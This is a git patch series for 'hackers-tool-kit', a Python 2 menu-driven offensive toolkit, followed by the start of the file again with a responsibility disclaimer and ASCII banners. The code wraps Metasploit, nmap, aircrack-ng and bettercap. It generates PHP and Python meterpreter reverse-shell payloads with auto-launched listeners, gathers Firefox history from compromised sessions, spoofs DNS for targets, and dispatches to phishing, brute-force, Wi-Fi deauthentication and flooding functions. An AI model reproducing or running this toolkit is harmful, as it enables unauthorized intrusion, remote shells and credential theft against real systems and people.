/root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#DNS SPOOF START# -#---------------# -def dnsspoof(): - target = raw_input("\033[1mTarget:\033[0m ") - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dns.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) - os.system('echo "dns.spoof on\n" >> dns.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dns.cap") - os.system("rm dns.cap") - -def dnsspoofall(): - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dnsall.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') - os.system('echo "dns.spoof on\n" >> dnsall.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dnsall.cap") - os.system("rm dnsall.cap") - - -#-------------# -#DNS SPOOF END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - try: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit": - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - if x == "dnsspoof": - dnsspoof() - if x == "dnsspoofall": - dnsspoofall() - if x == "htk-lite": - os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") - except: - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - found = True - -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 4421c13b5ac4815b6e283a8df32e506fdeeb29ae Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 3 Dec 2019 20:19:47 +0000 Subject: [PATCH 207/214] Add files via upload --- htk.py | 3298 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3298 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..022dca9 --- /dev/null +++ b/htk.py @@ -0,0 +1,3298 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +import readline +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + 